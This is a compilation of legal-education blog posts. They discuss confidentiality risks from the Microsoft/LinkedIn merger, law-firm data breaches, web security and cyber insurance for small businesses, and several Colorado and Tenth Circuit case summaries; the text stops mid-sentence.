April 29, 2017

The Ethical Danger of the Microsoft/LinkedIn Merger

Editor’s Note: This post originally appeared on Stuart Teicher’s blog, “Keeping Lawyers Out of Trouble,” on June 16, 2016. Reprinted with permission.

Headshot-Stuart-TeicherBy Stuart Teicher

This week it was announced that Microsoft is buying LinkedIn. There are some hidden attorney ethics implications about which we all need to be aware.

A review of the recent news articles announcing the acquisition reveals that a key motivating factor in Microsoft’s purchase of LinkedIn was access to LinkedIn’s data.  Of course, sharing data is nothing new. But when companies improve their ability to share our data across various platforms, my ears perk up. Not just because it’s creepy or because of obvious privacy implications. The type of data sharing they’re contemplating in the Microsoft/LinkedIn combination makes me worry about confidentiality (and other) issues.

Why they are merging:

According to the Wall Street Journal, Microsoft sees a critical synergy with LinkedIn:

“LinkedIn’s users are, arguably, Microsoft’s core demographic. They also offer Microsoft something it has long sought but never had—a network with which users identify. Microsoft needs to persuade LinkedIn users to adopt that identity, and use it across as many Microsoft products as possible.

Access to those users, as well as the enormous amounts of data they throw off, could yield insights and products within Microsoft that allow it to monetize its investment in LinkedIn in ways that the professional networking site might not be able to. [Microsoft CEO] Mr. Nadella already has mentioned a few of these, including going into a sales meeting armed with the bios of participants, and getting a feed of potential experts from LinkedIn whenever Office notices you’re working on a relevant task.“

In other words, Microsoft wants to have your Outlook and other Microsoft software products speak to your LinkedIn profile. The intersection of that data is valuable—various sellers of products and services would be willing to pay for it.

It appears that Microsoft wants to be able to read through the work we do on their products like Word, review our upcoming appointments in our Outlook calendar, search for keywords in our emails, and then find connections with people with our LinkedIn connections. That’s what they are searching for—connections they could monetize.

For instance, let’s say accountant X has an Outlook Calendar appointment which sets a meeting with “Charles McKenna of Account-Soft Corp.” Microsoft could then search LinkedIn and it would learn that McKenna works for a company that sells workflow management software. Well, now Microsoft knows the accountant is in the market for workflow management software… and they could sell that knowledge to other software companies who would then direct solicitations in the accountant’s direction. That’s an annoyance for an accountant, but a potential ethics disaster if he/she were a lawyer.

Basic issue, Confidentiality:

If Microsoft scours our Word documents and emails, then there could be Rule 1.6 confidentiality issues.  That’s so obvious that we don’t need to spend time talking about it now. I think the more unusual issues come from the Calendar function…

If they leverage the data in our Calendar, it could reveal our client relationships:

The substance of what we learn from the client is confidential, but so is the very existence of the lawyer-client relationship. Will the integration of these platforms make it easier for people to figure out who we represent?

Think about how much information Microsoft could piece together from our Calendar. They might see a potential client introduction (which lists Pete Smith as present), a court appearance (which lists Pete Smith as present), and a meeting for settlement purposes (which lists Pete Smith as present). It’s not going to be too tough for the Microsoft bots to figure out that Pete Smith is your client.

If they leverage data in our Calendar, it could reveal key substantive information that could harm the client:

If Microsoft looks at our Calendar they can see that we’re heading to a particular locale. They might then cross reference our LinkedIn connections and send a message to one of them that says something like, “Your connection Bruce Kramer is going to Chicago next week. Why don’t you look him up?”

That heads-up might give someone the incentive to look into our movements a bit more… and who knows what they could find. What if that info was given to a real estate agent that we know in Chicago… and maybe we are representing a successful land owner… and we’re clandestinely scouting a real estate purchase because we don’t want people to figure out that we’re there on behalf of our deep-pocketed client… because if they know, the purchaser will run up the price. That LinkedIn message tipped off the real estate agent and it could cost the client a lot of money.

If they leverage data in our Calendar, it could end up revealing a misrepresentation:

Imagine that Client A asks you to accompany them to a meeting in Los Angeles. You tell her that you can’t go because you’ll be on vacation on the East Coast. That’s not true, however. The truth is that you’ve already scheduled a meeting with a potentially new client in Los Angeles. You didn’t want Client A to know that you’d be in town because you didn’t want to have to shuffle between clients—it would just be too much work. You could have told Client A that you’d be in town but you didn’t have time to meet her, but you thought she’d be insulted. It was just easier to say you’re far away and be done with it.

Later, Client A gets a LinkedIn message that says, “Your Connection Mary Smith is going to be in Los Angeles next weekend… send her a message and try to link up!” Do you know what you are now? Busted. And not only do you have egg on your face, but you may also have committed an ethical violation.

Is the white lie that you told your client going to be considered a misrepresentation or deception per Rule 8.4(c)? That rule states: “It is professional misconduct for a lawyer to (c) engage in conduct involving dishonesty, fraud, deceit or misrepresentation…”

I know what you’re thinking… it was a half-truth. No harm no foul. Well, I searched the ethics code, and I didn’t find the term “white lie” or “half-truth” anywhere in the code. You should also note that Rule 8.4(c) does not require that the misrepresentation be “material.” It doesn’t allow you to lie about inconsequential things and there’s no modifying language- it just says that you can’t lie or deceive.

These are just a few issues. Some of these are clear ethics concerns, others are more akin to PR nightmares. Are they so terrible that we all need to get off LinkedIn right away? That might be a bit premature. After all, they only just announced the merging of the platforms- they haven’t actually done anything yet. I don’t know what dangers will actually be realized, or whether any dangers will be realized at all. What I do know is that part of being a responsible attorney in this technological age is to be diligent in thinking about these issues. As lawyers practicing in an ever-changing technological environment, we need to be aware of the potential problems. Keep your eye on the news and stay abreast about the details regarding the integration of these two platforms. Then, if you determine that you need to act, do so.  That way we are “keep[ing] abreast of changes in the law and its practice, including the benefits and risks associated with relevant technology.” Comment [8], Rule 1.1.

Save the Date!

Stuart Teicher will be at the CLE offices on Thursday, September 8, 2016, to present two ethics programs. Registration is not yet open, but mark your calendars and don’t miss these important programs.

 

Stuart I. Teicher, Esq. is a professional legal educator who focuses on ethics law and writing instruction. A practicing attorney for over two decades, Stuart’s career is now dedicated to helping fellow attorneys survive the practice of law and thrive in the profession. Stuart teaches seminars and provides in-house training to law firms/legal departments.

Stuart helps attorneys get better at what they do (and enjoy the process) through his entertaining and educational CLE Performances. His expertise is in “Technethics,” a term Stuart coined that refers to the ethical issues in social networking and other technology. He also speaks about “Practical Ethics”– those lessons hidden in the ethics rules that enhance a lawyer’s practice. Stuart writes the blog “Keeping Lawyers Out of Trouble.”

Mr. Teicher is a Supreme Court appointee to the New Jersey District Ethics Committee where he investigates and prosecutes grievances filed against attorneys, an adjunct Professor of Law at Rutgers Law School in Camden, New Jersey where he teaches Professional Responsibility and an adjunct Professor at Rutgers University in New Brunswick where he teaches undergraduate writing courses. He is a member of the bar in New York, New Jersey and Pennsylvania. In 2014, he authored the book Navigating the Legal Ethics of Social Media and Technology (Thomson Reuters).

Colorado Court of Appeals: Dormant Commerce Clause Not Violated Where Defendant Interacted with Colorado Investigator

The Colorado Court of Appeals issued its opinion in People v. Helms on Thursday, June 16, 2016.

Internet Child Exploitation Statute—CRE 404(b)—Bad Act Evidence—Evidence—Probation Revocation.

Defendant was convicted of two counts of Internet exploitation of a child. He was sentenced to 10 years of supervised probation on each count. The district court later revoked his probation when he failed to register as a sex offender and resentenced him for an indeterminate term of two years to life.

On appeal, defendant contended that the Internet child exploitation statute, C.R.S. § 18-3-405(1)(a), is facially unconstitutional for several reasons. The Court of Appeals disagreed. The statute does not violate the dormant Commerce Clause of the U.S. Constitution because the statute is limited to situations in which the criminal conduct occurs either wholly or partially in Colorado. It also does not violate the First Amendment because it is not overly broad, and it does not violate defendant’s constitutional right to due process because it is not vague.

Defendant also contended that the district court erred by admitting a statement he made, arguing that it was CRE 404(b) bad act evidence. However, the statement was not admitted as evidence of defendant’s bad character; rather, it directly rebutted his defense. Therefore, the district court did not err by admitting this evidence.

Defendant additionally argued that the evidence was insufficient to support his convictions. He argued that his conviction for count one was not supported by sufficient evidence because the jury was instructed that he must have committed the crime in Colorado to be guilty of child exploitation. However, the sufficiency of the evidence is measured against the elements of the offense rather than jury instructions. The child exploitation statute does not require that the actor be in Colorado at the time of the criminal communication. As to the second count, defendant’s conduct did not meet the requirements of the essential elements of the offense. Therefore, this conviction was reversed.

Defendant also argued that the district court erred by denying his motion for a mistrial after a witness testified about an inadmissible matter. Defense counsel elicited the statement from the witness, and although it was prejudicial, the court offered to give a curative instruction to the jury, which defense counsel declined. Therefore, the district court did not abuse its discretion by denying the motion for a mistrial.

Lastly, defendant contended that the district court’s revocation of his probation must be reversed because the district court did not adhere to the applicable statutory requirements. There was not sufficient evidence that defendant waived his right to be advised by the court through counsel, or that he was advised of potential penalties before the probation revocation hearing. In addition, the district court revoked defendant’s probation without obtaining and considering treatment and monitoring recommendations from defendant’s probation officer or treatment provider, as required by statute. Therefore, the district court’s revocation of defendant’s probation was reversed.

The judgment was affirmed in part and reversed in part, and the case was remanded.

Summary provided courtesy of The Colorado Lawyer.

The Internet of Things: A Disrupter? Precarious? The Jetsons?

IP_2016By John Ritsick, Esq.

Predictions about how much and how quickly technology will change the world can vary – we all can ask “where’s my flying car” now that the 2015 of “Back to the Future has come and gone and we still don’t have those flying cars. But the impact of The Internet of Things (IoT) will be significant, and the scope and scale can be mind-boggling. The IoT is the network of physical objects—devices, vehicles, buildings, and other items—embedded with electronics, software, sensors, and network connectivity that enables these objects to collect and exchange data. I work in the manufacturing industry and see the changes coming before they are close to the market, and I am constantly blown away by what we know is coming.

Nearly every industry and every type of tangible item is a potential participant in the IoT. The industries affected include automotive, transportation, city infrastructure, homes and household goods, retail stores—virtually all industries can potentially be incorporated into the IoT. Self-driving cars necessarily mean the car is connected to the Internet and is “smart” technology, but a self-driving car also means that other cars and vehicles are connected, that the roads the cars drive on and traffic systems are part of a larger environment, and that our emergency response services are connected as well.

I’ll be moderating a talk on the IoT at the 2016 Rocky Mountain IP & Technology conference in Denver in June. My colleague at Flex, Kenji Takeuchi, leads Products and Technology Management for the Flex’s Connected Living and IoT Software business. He’ll be talking about this subject and other thoughts on where technology is headed—it will be an insightful look into the future!

John Ritsick, Esq., is in-house counsel at Flex, a global leader In the categories of design, manufacturing, distribution, and aftermarket services. Find out more about the 2016 IP & Technology Institute at the links below.

 

CLE Program — 14th Annual Rocky Mountain Intellectual Property & Technology Institute

This CLE presentation will occur on June 2-3, 2016, at the Westin Westminster Hotel. Register online or call (303) 860-0608.

Can’t make the live program? Order the homestudy here: CDMP3

Two Law Firm Hacks Should Be Scaring Your Firm Into Action

Editor’s Note: This post originally appeared on Stuart Teicher’s blog, “Keeping Lawyers Out of Trouble,” on April 4, 2016. Reprinted with permission.

Headshot-Stuart-TeicherBy Stuart Teicher

For years people have been warning that law firms of all sizes are major targets for cyber-criminals. If your firm didn’t take that seriously before, then there are two major hackings last week that should get your attention.

The Wall Street Journal reported that cyber criminals breached Cravath, Weil Gotshal, and several other unnamed firms (read the article here: http://on.wsj.com/1MzYlN2). The paper states that it’s not clear what (or whether) information was taken, but the focus is on the possibility of confidential information being stolen for purposes of insider trading.

The other major breach is so big that it has its own hashtag— search Twitter for #PanamaPapers or #PanamaLeaks.  According to Reuters, the target was a law firm in Panama who specializes in setting up offshore companies. Hackers stole data from the firm and provided that data to journalists who promptly revealed it to the public (read the article here: http://reut.rs/25GEy4X). The information allegedly reveals a network of offshore loans. According to the BBC, the stolen data reveals how the law firm, “has helped clients launder money, dodge sanctions and avoid tax” (read the BBC’s article here: http://www.bbc.com/news/world-35918844). Political figures and friends of popular politicians are allegedly implicated, according to the report.

My concern is not about the obvious political ramifications. My concern is about the ethical ramifications to lawyers. The danger of hacking is real.

No report has implicated any type of ethical wrongdoing on the part of any firm. That needs to be restated and made abundantly clear: there has been no report of any evidence of ethical impropriety by any of the law firms mentioned in the news. I am bringing this to your collective attention because it should serve as a warning. Confidential client information was stolen from that law firm in Panama… which reminds us that we are targets.

All lawyers are targets. Small firms, large firms, in-house counsel, government lawyers, you name it. The bad guys know that lawyers are the custodians of valuable information and they are coming after us in a big way. The message for all of us is clear: you could be subject to an ethics grievance if you don’t take proper steps to secure your clients’ information.

The responsibility to protect our client information is nothing new. However, these recent events require us apply an increased sense of urgency to evaluating our compliance with that duty. Have you, or your firm, taken the necessary steps to adequately protect your clients’ information? Have you considered the fact that bad guys could be targeting you? What steps have you taken to counteract the potential piracy that could be aimed at your clients’ information?

You could be darn sure that someone is going to be asking those questions to the firms that were targeted in the hacks. Maybe you need to put yourself in their position and ask, “how would we fare if that review was directed toward us?”

Our duty of competence requires that we take appropriate steps to protect our clients’ confidential information. And remember that you, as the lawyer, have the primary ethical duty, not your IT people. Furthermore, various ethics opinions have held that, in some circumstances, the lawyer needs to understand the underlying technology itself.

If these issues weren’t on the front burner in your office before, these two hacks should be causing you to shift your priorities.

Quickly.

 

Save the Date!

Stuart Teicher will be at the CLE offices on Thursday, September 8, 2016, to present two ethics programs. Registration is not yet open, but mark your calendars and don’t miss these important programs.

 

Stuart I. Teicher, Esq. is a professional legal educator who focuses on ethics law and writing instruction. A practicing attorney for over two decades, Stuart’s career is now dedicated to helping fellow attorneys survive the practice of law and thrive in the profession. Stuart teaches seminars and provides in-house training to law firms/legal departments.

Stuart helps attorneys get better at what they do (and enjoy the process) through his entertaining and educational CLE Performances. His expertise is in “Technethics,” a term Stuart coined that refers to the ethical issues in social networking and other technology. He also speaks about “Practical Ethics”– those lessons hidden in the ethics rules that enhance a lawyer’s practice. Stuart writes the blog “Keeping Lawyers Out of Trouble.”

Mr. Teicher is a Supreme Court appointee to the New Jersey District Ethics Committee where he investigates and prosecutes grievances filed against attorneys, an adjunct Professor of Law at Rutgers Law School in Camden, New Jersey where he teaches Professional Responsibility and an adjunct Professor at Rutgers University in New Brunswick where he teaches undergraduate writing courses. He is a member of the bar in New York, New Jersey and Pennsylvania. In 2014, he authored the book Navigating the Legal Ethics of Social Media and Technology (Thomson Reuters).

New Legal Technology: Reduced Risk, Increased Flexibility, Automated Systems—Better for Lawyers

tech-lawIt’s estimated that 90% of lawyers use mobile to check email; 34% of lawyers use tablets in the courtroom; 27% of law firms have legal blogs; 10% of individual lawyers have blogs; 48% use a tablet at work (and the tablet is capturing laptop share); 17% use litigation support software; 39% of blogs resulted in clients or referrals; 40% of solos and 30% of all lawyers use cloud services; and 58% use Dropbox to transfer and store files. Technology (including legal technology) moves fast, with new products and updates arriving at a dizzying pace.

Wouldn’t it be nice if this burgeoning technology resulted in less time in the office and an increase in billings? Many attorneys are finding this to be the case. Automating systems and keeping better track of files and cases has actually resulted in more flexibility and peace of mind for attorneys, even those having to juggle more responsibilities. In addition, smaller firms have discovered by using new technologies they are able to better compete with larger firms.

This year’s first Colorado Legal Technology Expo is October 27-28, 2014, at the CBA-CLE offices in Denver. The Legal Technology Expo is free and the place for the technology and legal communities to interact and to mutually benefit.

Not only will there be legal technology companies exhibiting, but short, educational seminars offered on the latest in technology for the legal community. Legal technology tips and best practices will be shared by experts with topics that include: Managing Interruption and Info Overload; Cloud Security; E-Recording; Using the Latest in Technology to Market Your Law Firm; and 5 Technologies Every Lawyer Should be Using Today.

We invite you to drop by, even for an hour or two, to the free Legal Tech Expo. Click here to find out more and to register for the 20-30 minute educational seminars.

CLE Program: The 2014 Colorado Legal Technology Expo

This CLE presentation will take place from Monday, October 27 through Tuesday, October 28, 2014. Click here to register.

 

Tenth Circuit: Special Master Must Employ Abstraction-Filtration-Comparison Test for Copyright Infringement

The Tenth Circuit Court of Appeals issued its opinion in Paycom Payroll, LLC v. Richison on Friday, July 11, 2014.

David Richison, with his niece and nephew, Shannon and Chad Richison,  formed a payroll processing company, Ernest Group, d/b/a Paycom Payroll, in Oklahoma in the 1990s. During his time with Ernest Group, David wrote two payroll processing software programs, BOSS and Independence. He transferred his authorship interest in BOSS to Ernest Group in the 1990s. When the relationship between David and Chad deteriorated in 2001, David moved to Maryland and formed his own company called Period Financial Corporation. At Period, he wrote a new software program based in part on Independence, which he called Period Indy. In May 2009, Ernest Group filed a copyright infringement lawsuit against David, asserting that Period Indy infringed on Ernest Group’s copyright in BOSS. Ernest Group subsequently filed for copyright on Independence, stating that it was a work for hire. By 2011, David had written another program, Cromwell.

In August 2011, the parties settled and agreed to the entry of a consent decree. All of Ernest Group’s claims were released except its claim for injunctive relief based on copyright infringement, and all rights to Independence were assigned to Ernest Group. The partied agreed that the district court should appoint a special master to write a report regarding whether the Cromwell program infringed on either BOSS or Independence, and the district court should decide the issue based on the special master’s report. The parties disagreed as to which version of Cromwell should be used for the analysis, but not which versions of BOSS and Independence. The special master opined in his report, marked “Attorney’s Eyes Only,” that Cromwell infringed upon both BOSS and Independence. The district court adopted the special master’s findings and ordered that all copies of Cromwell should be destroyed.

After the report was filed, David objected to the “Attorney’s Eyes Only” restriction, noting that as the author of all the software in question, he could assist his attorneys in reviewing the substance of the report. Ernest Group opposed the motion, and the district court denied it, stating that David advanced no grounds to support lifting the restriction. David’s attorneys filed objections to the special master’s report, arguing that the special master failed to conduct the abstraction-filtration-comparison test, or at least that he did not document his application of the test. Ernest Group’s attorneys agreed with the objections to some extent and requested that the report be resubmitted to the master for further findings. Before the district court could rule, Ernest Group’s attorneys mailed David’s “highly critical” objections directly to the special master. David’s attorneys called for a new special master, claiming that Ernest Group had irrevocably tainted the master’s neutrality. The district court, instead of resubmitting the report to the special master, called on Ernest Group’s attorneys to offer a more substantive response to David’s critique of the report, which they did. The district court adopted the special master’s report in its entirety, ruled that Cromwell infringed upon Ernest Group’s copyrights in both BOSS and Independence, and ordered all copies of Cromwell destroyed. This appeal followed.

David raised four issues on appeal: (1) the “Attorney’s Eyes Only” restriction should be lifted, (2) the special master erred by evaluating versions of BOSS and Independence that were never registered with the copyright office, (3) the special master’s report was inadequate and the versions were not substantially similar, and (4) a new special master should be appointed if remand is necessary. The Tenth Circuit evaluated these claims in turn. The Tenth Circuit declined to agree with David on the first claim, noting that he agreed to the restriction in a consent decree and allowing David to view the report was not so fundamental of a right as to be unwaivable, and commenting that such restrictions are common in trade secret litigation. For the second claim, the Tenth Circuit similarly rejected David’s arguments, since he impliedly consented to the versions in two documents submitted to the court and his argument was therefore waived.

As to the third claim, the Tenth Circuit reversed the district court’s adoption of the special master’s report. The Tenth Circuit agreed that the special master should have documented his application of each step of the abstraction-filtration-comparison test, which he did not do. The report contained little evidence that the master performed the abstraction test, and in fact the report seemed to deem abstraction superfluous. Because the abstraction test was not performed, the special master’s findings regarding filtration were limited, and his entire analysis was flawed. The case was remanded for more complete reporting by the special master. In his fourth claim, David requested that a new special master be appointed, due to potential bias from the master receiving David’s critique. The Tenth Circuit disagreed, because the parties had agreed to this particular special master, and also noting that it only addressed David’s contentions in this appeal so if need arose for a different special master in the future that claim would not be barred.

The district court’s judgment was reversed and remanded for further reporting by the special master using the abstraction-filtration-comparison test.

Tenth Circuit: FCC Denial of Petition for Regulatory Forbearance Pertaining to Telecommunications Services Was Reasoned and Reasonable

The Tenth Circuit Court of Appeals published its opinion in Qwest Corp. v. FCC on Monday, August 6, 2012.

The Tenth Circuit denied the petition for review. Petitioner  sought “review of an order of the Federal Communications Commission (FCC) denying Petitioner’s petition for regulatory forbearance pursuant to 47 U.S.C. § 160(a). Petitioner filed a petition with the FCC in March 2009 seeking relief from certain regulations pertaining to telecommunications services that it provides in the Phoenix, Arizona, metropolitan statistical area (MSA). The FCC denied the petition, citing insufficient evidence of sufficiently robust competition that would preclude Petitioner from raising prices, unreasonably discriminating, and harming consumers. Petitioner challenges the FCC’s decision only as it pertains to Petitioner’s mass-market retail services in the Phoenix MSA. The Court denied the petition, finding that the Phoenix Order was a reasoned and reasonable decision.

Law Firms and Small Businesses: Protecting Security Interests (Part 2)

Editor’s Note: This is the second in a two-part series of cyber security articles. Part one can be found here.

Reasonable Contractual Expectations

One of my best contractual stories revolves around a conversation with the president of a local web site design firm – a good friend and one who feels comfortable with being candid with me. During one of his development projects, I offered to do a free security evaluation of the soon-to-be-released web application. His rejection of my offer came with the rationale that if the web application was ever compromised, he wanted to be able to honestly tell the client that, to the best of his knowledge, the delivered web site was secure.

I haven’t the faintest idea of the legality of my friend’s hope for plausible deniability, but it should be obvious that two very poor consequences come out of his approach to security. The first is that his client will end up with an unsecure web site, when they could just as easily have had a product that would have withstood all but the most experienced and persistent hackers.

The second eye-opening realization is that the client never asked about security, and the development contract never addressed security. In this case, the client (and potentially the law firm that reviewed the contract) never included security development and testing as one of the primary requirements of the relationship. A single section added to the development contract might have the effect of preventing a devastating security breach.

A favorite statement of mine goes as follows:

Businesses end up with a lack of security because they never, ever ask about it. 

Almost all web site development contracts include obvious legal details like payment schedules, software ownership, and product specifications. These terms protect the interest of the business as well as the development firm – standard boilerplate.

A well-written contract should also include a requirement that the contracted web site be developed under strict security guidelines (consider OWASP as a source of information) and that a comprehensive third-party security penetration test (Acunetix as one such test) be run and presented before product acceptance.

The additional cost for security-oriented development should be minimal, since a knowledgeable development firm should be adhering to these practices regardless of a request. The third-party security penetration test can be contracted for with one of many firms and should cost only a few thousand dollars.

Again, the role of a law firm in this environment should certainly be the crafting and approval of the basic development contract, but also making sure security validation is a well-defined requirement of the overall agreement.

How to Respond After a Breach

When a security breach does occur, businesses (and their counsel) need to be ready to react thoroughly and decisively. A few of my suggestions for the days, weeks, and months following a breach are:

  • Don’t panic. Carefully consider the nature of the breach, what data (if any) has been compromised and what the business’ next steps should be. A premature release of breach information may cause unnecessary customer panic or, even worse, make management look even more inept when they revise information sent out too hastily. Advise them to take the time to respond with dignity and thoughtfulness.
  • If required, inform the appropriate financial and legal entities as soon as possible. Depending on the industry, there may be strict requirements for reporting security breaches. Your client’s problem will only get worse if they are caught hiding information. Keep in mind that many security breaches become public knowledge as the compromised data is used or sold within the cyber underground, not as a result of company disclosure. As a side note, an embarrassingly large number of security breaches are never discovered by the company that was breached.
  • Inform users or clients and customers as soon as appropriate. There is a line between keeping a company viable and an ethical responsibility to customers. My thoughts on this line are to consider the damage that might be done to customers and think about how you would expect to be treated.
  • Call the insurance company. Depending of the nature of the breach, the business may be covered for some, if not all, of the expenses associated with recovery. Suggest that the business give their insurance company a call. They might also take the time to talk about cyber insurance with their agent – for the next time.

As a legal professional, you should easily be able to see the pitfalls inherent in panic-stricken businesses reacting to security breaches. Legal, financial, and professional stakes surrounding a security breach may be high enough to shut down the business. The correct reaction may be well outside of the expertise of the business, or, even worse, the business may naively attempt to react on their own.

Conclusion

Hopefully, I have provided food for thought on the security opportunities and responsibilities of law firms supporting small businesses and their own technological infrastructure. Obviously, I’ve brought up far more issues and concerns than solutions. My hope is that even a casual discussion of security problems will prepare you with far more knowledge than the majority of your clients.

It’s a mean world out there; cyber crime is an industry run by foreign nationals from countries where cyber criminals are not prosecuted. An industry-accepted statistic is that more than 70% of all Internet web sites contain critical security vulnerabilities. Many of your clients, and your own web sites, undoubtedly are on the wrong side of this depressing number.

One final note to add one more level of additional worry: Web application security awareness has only recently entered mainstream web site development. If your web site or your client’s is more than four years old, not only is it certainly open to a critical security attack, but it is probably a target for even the most amateurish hackers: script kiddies, young kids who hack web sites because doing so is more fun than playing a predictable Xbox game.

Alan Wlasuk is a managing partner of 403 Web Security, a full service, secure web application development company. A Bell Labs Fellow award-winner with 18+ years of experience building secure web applications, Wlasuk is an expert in web security – from evaluation to web development and remediation.

Learn More: Cyber Security/Privacy CLE Homestudy Programs

Is Your Sensitive Data Secure: Cyber Insurance for Your Firm and Your Clients (video on-demand and mp3 download)

Avoiding The Lawyer’s Digital Nightmare: How To Safeguard Your and Your Clients’ Sensitive Information And Survive The Inevitable (?) Security Breach (video on-demand, mp3 download, and audio CD)

Ethics in a Wild Wired World (video on-demand, mp3 download, and audio CD)

To Use and Protect: Privacy Basics for Business (video on-demand and mp3 download)

Law Firms and Small Businesses: Protecting Security Interests (Part 1)

Editor’s Note: This is the first in a two-part series of cyber security articles. Part two can be found here.

Is there anything more financially fragile than a small business in the U.S. today? As we climb out of the Great Recession, many of the surviving small businesses were forced to cut corners, often making compromises on the IT side. Combine this with an unprecedented rise in cyber crime that took the 2011 U.S. cost of security breaches to $32 billion, and one can easily predict the future security troubles of many small businesses.

As legal, and sometimes operational and financial, advisers to small businesses, law offices should be more aware than ever of the security risks to small business clients, understand how to mitigate these risks, and lend support when a security breach occurs.

These considerations are also important for attorneys to make regarding their own online presence and security risks, especially solo/small firm practitioners.

While I can’t cover IT security in its entirety here, I’ll touch on three areas, each of which should give you an idea of security troubles ahead and what you might be doing to anticipate these troubles:

  1. Professional and financial liabilities
  2. Reasonable contractual expectations
  3. Responses after a breach

To set the stage for my thoughts on the advice and support a law office might provide to small businesses, consider for themselves, or at least be aware of, let me start by sharing a few details of my background. I am the managing partner of 403 Web Security, a web application security company, and WDDinc, a software development firm with close to 20 years of developing software, much of it for small businesses. While I am not a legal expert, I have seen more than my share of software related contracts and have a firsthand view of the risks these organizations place themselves under.

For the sake of simplicity and to take full advantage of my experience, I’ll limit my notes to web application security – more commonly known as security within small business web sites.

Professional and Financial Liabilities

Without hesitation, I can say that the vast majority of small businesses not only have inadequate security protections in place, but also are oblivious to the fact they are security risks. Even worse, recent headlined security breaches of high-profile companies seem to engender only a misguided belief that they are immune from security attacks because they are small fish in a huge ocean.

The truth is, not only are small businesses not immune from attack, they are prime targets because of their lack of security. Consider the monetary value of even small, undetected breaches – unlimited time to exploit compromised data and the opportunity to revisit the sources months and years into the future.

When considering security liabilities, I like to separate small businesses into two categories. The first would be those businesses that collect and save protected data (i.e., medical, identity) within their own environments. The web sites that support these businesses tend to be custom built by design or development companies that have little or no experience in creating secure web sites, and almost never have the capabilities of testing new sites for security vulnerabilities. These companies potentially are open to huge fines when their data is compromised.

The second, and larger, category is small businesses with e-commerce components. These businesses usually, and wisely, use well-established (and secure) external web services to handle credit card and other payment transactions. Unfortunately, this approach is successful only when the business’ basic web site is secure. The point almost always missed is that a hacker does not always breach a web site for its underlying data. For example, a hacked site may be modified in subtle ways to take an unsuspecting consumer to a fraudulent e-commerce service that will happily collect and exploit the consumer’s credit card as soon as it is entered. Or, one of my favorite security flaws, Cross Site Scripting (XSS), might allow a hacker to take over a legitimate user’s browser – effectively compromising that user’s e-commerce transactions or invading the user’s entire computer.

In either case, a small business may be financially and legally liable for the fraud and illegitimate use of information from its security breaches. Perhaps just as importantly, the loss of reputation and consumer confidence alone might be enough to ruin any small business.

A proactive law firm might be in a unique position to address potential security issues and breach consequences with their clients. This should be part of the support of any client and attorneys should heed the same advice themselves.

Alan Wlasuk is a managing partner of 403 Web Security, a full service, secure web application development company. A Bell Labs Fellow award-winner with 18+ years of experience building secure web applications, Wlasuk is an expert in web security – from evaluation to web development and remediation.

Learn More: Cyber Security/Privacy CLE Homestudy Programs

Is Your Sensitive Data Secure: Cyber Insurance for Your Firm and Your Clients (video on-demand and mp3 download)

Avoiding The Lawyer’s Digital Nightmare: How To Safeguard Your and Your Clients’ Sensitive Information And Survive The Inevitable (?) Security Breach (video on-demand, mp3 download, and audio CD)

Ethics in a Wild Wired World (video on-demand, mp3 download, and audio CD)

To Use and Protect: Privacy Basics for Business (video on-demand and mp3 download)

Colorado Supreme Court: PUC Considered All Mandated Factors in Setting Rates for Basic Residential Phone Service with Evidence to Support Decision

The Colorado Supreme Court issued its opinion in Colorado Office of Consumer Counsel v. Colorado Public Utilities Commission on April 30, 2012.

Basic Residential Telephone Service Regulation—Maximum Rate Setting.

The Supreme Court reversed the district court’s judgment, holding that the Colorado Public Utilities Commission (PUC) regularly pursued its authority in setting maximum rates for basic residential telephone service pursuant to CRS § 40-15-502(3)(b). The PUC considered all of the statutorily mandated factors in setting the rates and there was substantial evidence supporting its decision.

Summary and full case available here.

Cyber Insurance: An Efficient Way to Manage Security and Privacy Risk

Practically every company in our modern economy has information security and privacy risk. There is no way to completely eliminate it. Whether it is your firm or your client, most companies of all shapes, sizes, and wealth profiles use information technology and handle sensitive information including personal information and credit card numbers. That means organizations face potential direct losses, lawsuits, and liability due to data, security, and privacy breaches.

The frequency and magnitude of data breaches by hackers has only been increasing. We read about security and privacy breaches practically every day in the newspaper. As the world continues to change at seemingly light-speed and cyber risks increase, the need for risk transfer with cyber insurance is also growing. Relying on a general liability or property policy to provide the coverage is no longer a wise choice (if it ever was), and companies could be well-served to get peace of mind and relative predictability by learning more about cyber policies that are actually designed to address the risk.

CBA-CLE will be hold a program on Thursday, March 29 to address the impact of data breaches and the trend toward cyber insurance. The program presenter, David Navetta, Esq., has written several articles about data security and cyber insurance. Read some of his insights below, and then join us to learn more about protecting sensitive information with cyber insurance, an option that may be of great importance to your clients or law firm.

In the early 2000s, just around the “DotCom Bust,” some insurers began developing a product designed to address the financial loss that might arise out of a data breach. This was a time where most “brick and mortar” companies were just beginning to leverage the economic potential of the Internet. At that time, insurers wanted to target the big “dotcom” companies like Amazon, Yahoo, eBay, Google, etc., and other companies pioneering e-commerce and online retailing. At some point, somebody dubbed this type of insurance “cyber insurance.”

The early cyber policies included liability and property components. The liability coverages addressed claim expenses and liability arising out of a security breach of the insured’s computer systems (some early policies only covered “technical” security breaches, as opposed to policy violation-based security breaches). The property-related components covered business interruption and data asset loss/damage arising out of a data breach (during the holiday season many online retailers suddenly developed a tasted for business interruption coverage after realizing just how negatively their business would be impacted by a denial of service attack).  Additional first party coverages included cyber-extortion coverage and crisis management/PR coverage.

Unfortunately for the carriers, it was not easy to get people to understand the need for this coverage (and that is still a challenge today, but certainly a lesser challenge with all of the security and privacy news constantly streaming). Early on there were very few lawsuits and regulators were just beginning to consider enforcement of relatively new statutes like GLB and HIPAA.

Two things changed that made cyber insurance much more relevant. One was a rather sudden event, and the other more gradual.

First, in 2003, California passed SB1386, the world’s first breach notification law. The reality then (as now) is that companies suffer security breaches each and every day. Prior to SB1386, however, breaches of personal information simply went unreported. With SB1386 and the subsequent passage of breach notice laws in 45 other states (and now coming internationally), the risk profile changed for data breaches. Instead of burying the breaches, companies were required to incur significant direct expenses to investigate security breaches and comply with applicable breach notice laws, including the offering of credit monitoring to affected individuals (which is not legally required by existing breach notice laws, but is optionally provided by many companies or “suggested” by state regulators). As a result, the plaintiffs’ bar now had notice of security breaches and began filing class action lawsuits after big breaches (usually involving high-profile brand name organizations). As such, cyber insurance coverage went from coverage addressing a hypothetical risk of future lawsuits, to a coverage addressing real-life risk (and now we have lawsuits getting deeper into litigation and public settlements of these types of cases). Moreover, shortly after the passage of SB 1386 many cyber insurance policies began covering the direct costs associated with complying with breach notification laws, including attorney fees, forensic investigation expenses, printing and mailing costs, credit monitoring expenses and call center expenses.  Breach notification costs are direct and almost unavoidable after a personal information breach.  Regardless of lawsuit activity, a direct financial rationale 